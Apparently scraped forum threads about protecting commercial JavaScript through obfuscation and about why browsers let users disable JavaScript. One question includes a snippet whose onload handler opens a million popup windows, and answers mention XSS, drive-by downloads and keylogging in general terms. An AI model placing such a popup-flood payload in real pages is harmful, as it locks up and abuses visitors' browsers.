To be honest, with any software, no method of protection is 100% safe from being misused. Think, for example, with even large-scale commercial pieces of software, such as Photoshop, Windows or OS X. All have methods in place to try and prevent people from misusing or pirating their software, and to the average user, this is fine, and prevents people from simply copying their software and distributing it illegally.
However, if people really want to use software illegally, they'll find a way - they may reverse-engineer it, and then create keygens or remove piracy mechanisms completely, for example.
Of course, being a scripting language, applications written using JavaScript is more susceptible to misuse, since, as you pointed out, as the JavaScript runs client-side, anyone can view your JavaScript quite easily. However, for many of your customers, this shouldn't be a problem, and it is quite common nowadays for companies to software of this nature commercially, which use JavaScript as the main method of their implementation.
There may be a few people who try and misuse your software, but as I pointed out above, this occurs in all walks of software development, and all you can do is your best to prevent this from happening. As you suggested, JavaScript obfuscation is a good way to make the source less readable, (but there are some limitations, for example with stripping some legitimate lines of code that the obfuscator believes to be unnecessary), but at the end of the day, you just have to remember that most people are likely to legitimately use your software in the correct manner, and that over-protecting your software will only cause your legitimate users annoyance, to try to deter a small minority of people who are likely to provide a workaround to any mechanisms anyway.
Companies that normally sell JavaScript components are really selling support for those components. Guaranteed bug fixes, prompt response to questions, etc.
The easiest thing to do to obfuscate it would be to use the Online YUI minifier.
Basically, the effort required to de-obfuscate it, is pretty similar to having to rewrite it. That won't necessarily stop someone from stealing it, but again, it just depends on what kind of market you are in. Most people are honest.
Pretty much all JavaScript is open source by design. Seems that plenty of people are making money in open source. I wouldn't sweat it too much. Sell on the value or the service.
There are numerous companies which sell Javascript 'components', and I know at least some of them obfuscate their code. A lot of obfuscators & compressors do some horrendous things with eval and encoded strings... I'd recommend against going down that path.
In my experience, all obfuscated code does is frustrate your honest customers. In many ways it comes down to who you're targetting. If you're making drop-in components, obfuscating things isn't going to be a huge problem. If you're targetting developers, you're going to need to keep your code open imo.
If you choose to obfuscate, the best way for performance and reliability is going to be using a javascript compresser
Milonic sells some JavaScript components.
Not sure how they protect them, but they have been in business for a long time.
Remember that "stealing" the code is not just about obfuscation, but also about just straight-up copy-pasting it to another site and using it as-is. It would not be unreasonable to include some type of licensing request for the script, perhaps checking the domain the request was sent from against a central server. Of course, then you'd need obfuscation just to keep people from removing the licensing check...
There are some companies selling js code. How well they do it - don't know.
The only thing you can do to protect your code is to obfuscate it.

Why is JavaScript considered bad by some? [closed]

Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 8 years ago.
Improve this question
Why is JavaScript allowed to be disabled in the browser? (i.e. Why is it considered bad?)
<body onload="for(i=0; i<1000000; i++){window.open(
'samplesite.com?pageid=' + i);}">
Why is javascript allowed to be disabled in the browser? (i.e. Why is it considered bad?)
Because it can be grossly misused (blinking images, anyone?), may slow the browser down and of course there's always the (very justified!) fear of exploited security holes.
First of all with Javascript you can create events that the user might not want you to, like e.g. changing the size of the window...
On the other hand think about people who are somehow limited... What if your user was blind and uses a screenreader while your page continously changes its content somehow... There are many reasons against Javascript when it comes to accessibility...
Back in time, it used to be:
A source of annoying cursor-following animations (I am sure you remember stuff, like raining sheeps or clocks following your cursor... I want to find the smart*** who thought of that and slap them with a trout)
Considered insecure
Served no purpose but bog down the browser
However, over the years it has become more advanced and applied with more thinking behind it.
Historically it has been a huge security problem for web based services. Also with any technology that is exploitable and has a low technical barrier for entry it ends up the tool of the low brow trouble maker (script kiddies). Quick searches for javascript or xss in a security exploit database will show hundreds of pages of vulnerability.
JavaScript is often considered dangerous or at least annoying for two reasons:
Websites can suddenly do stuff that you don't want them to do, e.g. open popups
Websites can suddenly keep you from doing stuff that you want to do, e.g. disabling right-clicks
Now, in the vast majority of cases JavaScript is harmless and can really enhance the user experience (Ajax comes to mind). But all it takes is one malicious site that uses JavaScript to do evil (TM) things like Cross-site Scripting. For that reason it is commonly considered best practice to disable JavaScript globally and to allow it for just those sites or domains that you explicitly trust. In this day and age being paranoid on the Internet is actually a good thing.
It's a weakly-typed scripting language. Programmers who usually use "big strong" languages look down upon such nonsense. Shame on you for even considering using it, and my God have mercy on your soul.
It can cause security problems. Especially in old versions of IE (not so much anymore).
Or maybe it has something to do with Stallman's ranting ;-)
The main consideration is security. Drive-by downloads that exploit browser security holes via JavaScript are currently the most common way for malware to spread.
As well as what others have said it confuses search engines. The more 'dynamic' content you add the higher the chances it cannot be indexed. In addition the Internet is used by many as a reference library. Books in a real library do not change things around while you are reading the page. You may think of your site as an "application" but your users may prefer to treat it as a "document".
In short JavaScript obfuscates information, sometimes to the point of completely denying access (i.e., the JavaScript code is buggy and crashing). A classic example of this was that I was unable to watch the Live8 concert broadcast by AOL a few years back because the JavaScript code was so poorly written it didn't actually work on my girlfriends' AOL browser (ironic I know). I tried to get to the movie URL directly but the obfuscation was so complex I couldn't find it. It did nothing to endear me to AOL.
BTW, I happen to be one of those people who disable JavaScript by default. If I need it I can enable it for a specific site or page in 2 seconds (really) using the NoScript add-on for Firefox.
Some companies, or business units, have a policy of not allowing javascript turned on, as there are concerns about any risk of security exploits, and that may be the biggest problem, that since it can't be locked down securely then it must be disabled. If you can run javascript in a strict mode, that doesn't allow ajax requests, for example, then you may find that more people are willing to use it on computers that are concerned about security.
As long as a user can go to a website, and information can be sent transparently over the Internet regarding what a user is doing, then these security concerns will exist.
For example, I could have a Firefox plugin that appears to be useful, but, it can do possibly send unwanted info to a website.
Because it shifts load from the server to the client and there is no way to control to what extent.
I work with Javascript every day and respectfully acknowledge what it has made possible, but sometimes when I browse a very simple page, and the interface reacts lightning fast because there is nothing to render but pure, simple HTML, I think that that used to be the original purpose the purpose of the internet. You can, and I am exaggerating only little, browse these pages with a 600 MhZ Pentium with 128 megabytes of RAM without problems. While for a Javascript-heavy, effectful "rich" website, you need massive resources on the client side for a halfway smooth experience, and you need to update your equipent almost as often as gamers do.
Also, I generally feel some, not hostility, but slight annoyance towards Javascript because it massively increased development costs by adding a host of incompatible target platforms, version, obscurities and specialties to cater for, as well as a generally bug-prone, hard to debug and volatile environment to work in.
That said, I think the industry owes the creators of JQuery, Prototype and the likes big, big thanks, among many others.
JavaScript, as the inventor of JSON called it, is the virtual machine for the world. It's where billions of people are. This great exposure comes with some dangers other languages do not have to face.
Example. Write a site that just 'redirects' you to another site, where you can sign in. If you are not completely in control of your browser/URL etc. some JavaScript just could have loaded the page content from another site and will log your keystrokes. This could be achieved with a few lines of JavaScript. It's not really the fault (if it's a fault at all) of JavaScript, but all the components (browser, HTML, and this vast space, we call Internet).
Why is javascript allowed to be
disabled in the browser? (i.e. Why is
it considered bad?)
Because browsers are not prefect! And Its give you the way to safe yourself when you need it.
When security risk found out, they will just post in their home page
Please disable javascript until its fixed
Like this, (I dont have offical page right now, so googled from somewhere)
http://browsers.about.com/b/2009/07/16/firefox-3-5-users-should-take-action-immediately.htm
However, until a fix is released, I
recommend that you either disable
JavaScript completely or use another
browser.
There are a few rare instances where JavaScript can be dangerous (but so can anything, including the massively ubiquitous Flash). The reason users actually do disable it or use addons like NoScript is largely unjustified paranoia.
In the end, users don't stick with behavior that breaks the websites they want to experience. So, I wouldn't expect JavaScript paranoia to be a long-term issue as only more and more sites depend on it (like this one).
It's similar to the hype we saw around cookies several years ago.
It can crash the browser, or do annoying things to users.
However, now a days Javascript has become such an integrated part of the internet (Gmail, bill paying for many companies sites, ect) that if you did disable it then browsing could arguably be difficult for you unless you had exceptions.
JavaScript has some very "odd" language features, like the handling of missing semicolons at statement endings by just ignoring the parse error ("semicolon insertion") or the behaviour of the typeof operator (array is an object).
You really need to know the language to know which things you should do and which are bad.
But there are also really good points about the language, like that it fully supports functional programming.
It is bad only you visit questionable sites. Without javascript you won't have apps like gmail, yahoo finance, etc.
Why is JavaScript allowed to be disabled in the browser?
Perhaps because computers are tools that serve humans? Computers speaking to computers via a protocol can mandate specific behaviour. Developers writing software for users have no such luxury.
It would be pointless for browser vendors to mandate that JavaScript "must" be enabled, since there are plenty of people who can't or don't want it. Especially since 90% of the time it's just being used by some spotty hipster to animate a cat picture.

Categories